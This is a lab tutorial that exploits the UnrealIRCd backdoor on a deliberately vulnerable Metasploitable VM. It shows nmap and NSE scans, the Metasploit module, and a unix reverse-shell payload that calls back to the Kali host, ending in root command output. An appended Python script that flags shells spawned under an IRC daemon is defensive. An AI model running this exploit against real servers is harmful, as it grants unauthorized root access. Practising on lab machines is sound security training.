Hack Metasploitable with UnrealIRC backdoor

Metasploitable is an OS with baked-in vulnerabilities for you to practice exploits using Metasploit. In this tutorial we will be taking a look at how to gain a reverse shell on our target machine by exploiting the UnrealIRC backdoor.

What is IRC?

IRC stands for Internet Relay Chat. It is a messaging service that was quite popular in the early 2000s, but since 2003 it has steadily declined in use. There are, however, still a significant number of people using IRC, so there is a good chance you may come across this potential vulnerability. Back in June of 2010 the IRC servers were hacked and the download was replaced by a version that had been compromised with a trojan backdoor. If someone is running this version, it’s a security hole.

The nice thing about this vulnerability is that it is not in a standard service that is likely to have been patched already. In a real-life situation it is much more likely you will find a hole that has not been patched in a third-party application than in the OS.

To begin, start up your Metasploitable virtual machine and your Kali Linux virtual machine. Then we will run nmap to see what services and ports are available.

┌──(kali㉿kali)-[~]
└─$ nmap 10.0.2.0/24 

We will see that our Metasploitable virtual machine has lots of ports and services running.

[Screenshot: nmap scan in Kali Linux]

Our target machine is on IP address 10.0.2.7, and you can see that the IRC service is running on port 6667.

Now we run the following command:

└─$ nmap --script irc-unrealircd-backdoor.nse 10.0.2.7 -p 6667

This will test whether the installed IRC version is vulnerable by running a time-based ping command and seeing how long it takes to respond.

[Screenshot: nmap unrealIRC]

The result printed in the terminal shows that the installed unrealIRCd is likely to be exploitable. We can find more details by visiting:

http://seclists.org/fulldisclosure/2010/Jun/277

So now we know that our target machine can likely be penetrated through this service. Let’s start Metasploit by typing msfconsole.

Now type search irc and you will see several results.

[Screenshot: search vulnerability in metasploit]

The one we are interested in is the unreal irc backdoor, which is number 14 on the list. So type use 14.

Now we need to decide on our payload. To see the available compatible payloads use show payloads and you will see several options for this.

[Screenshot: show payloads for exploit]

We will go with a unix reverse shell. Set the payload with set payload cmd/unix/reverse

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse

Now type options to see what settings are available.

[Screenshot: options in metasploit]

We need to set the RHOSTS and the LHOST. The LHOST is our Kali Linux IP address; the RHOSTS is the target machine IP address. You can see the port already defaults to 6667.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7

Now type options again and you should see the details are filled in.

[Screenshot: set options in metasploit for unrealIRCd]

Now it’s a simple matter of typing exploit to get the reverse shell.

[Screenshot: unrealIRCd exploit]

Now we can check what level of user access we have by typing whoami, and we can see it responds with root, meaning we have full root access to the target machine.

whoami
root
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

We can also get other information like the user ID, and the details of the system OS.

This is a pretty simple exploit to get to grips with, and shows how important it is to always run the latest versions of third party applications and your OS. IRC took down the vulnerable version immediately but not before thousands had already downloaded it.
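Seen from the defending side, the session above leaves a shell running as root underneath the IRC daemon. The following is an added example, not part of the original post, that flags that pattern in `ps -eo pid,ppid,user,comm` output; the daemon names, PIDs and the sample listing are constructed assumptions.

```python
"""Flag shells descended from an IRC daemon in `ps -eo pid,ppid,user,comm` output."""

# Constructed sample listing for illustration; the daemon name "unrealircd"
# and every PID here are assumptions, not values taken from the walkthrough.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     init
 4512     1 root     unrealircd
 4790  4512 root     sh
 5010     1 root     sshd
 5011  5010 msfadmin bash
"""

IRC_DAEMONS = {"unrealircd", "ircd"}   # assumed daemon process names
SHELLS = {"sh", "bash", "dash", "ksh", "zsh"}

def parse_ps(text):
    """Return {pid: (ppid, user, comm)} from ps output that has a header row."""
    procs = {}
    for line in text.strip().splitlines()[1:]:
        fields = line.split(None, 3)
        if len(fields) != 4 or not (fields[0].isdigit() and fields[1].isdigit()):
            continue  # skip malformed rows instead of crashing on them
        procs[int(fields[0])] = (int(fields[1]), fields[2], fields[3].strip())
    return procs

def irc_ancestor(pid, procs):
    """Walk the parent chain; return the PID of an IRC daemon ancestor, or None."""
    seen, ppid = set(), procs[pid][0]
    while ppid in procs and ppid not in seen:  # 'seen' guards against PID loops
        seen.add(ppid)
        if procs[ppid][2] in IRC_DAEMONS:
            return ppid
        ppid = procs[ppid][0]
    return None

def findings(text):
    """Return (severity, pid, message) tuples for suspicious processes."""
    procs, out = parse_ps(text), []
    for pid, (_ppid, user, comm) in sorted(procs.items()):
        if comm in IRC_DAEMONS and user == "root":
            out.append(("warn", pid, f"{comm} runs as root"))
        elif comm in SHELLS and (anc := irc_ancestor(pid, procs)) is not None:
            out.append(("alert", pid, f"{comm} ({user}) descends from IRC daemon pid {anc}"))
    return out

if __name__ == "__main__":
    for severity, pid, message in findings(SAMPLE_PS):
        print(f"[{severity}] pid {pid}: {message}")
```

The interactive bash under sshd is not flagged; only the shell whose parent chain reaches the IRC daemon raises an alert, and the daemon itself is reported because it runs as root.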
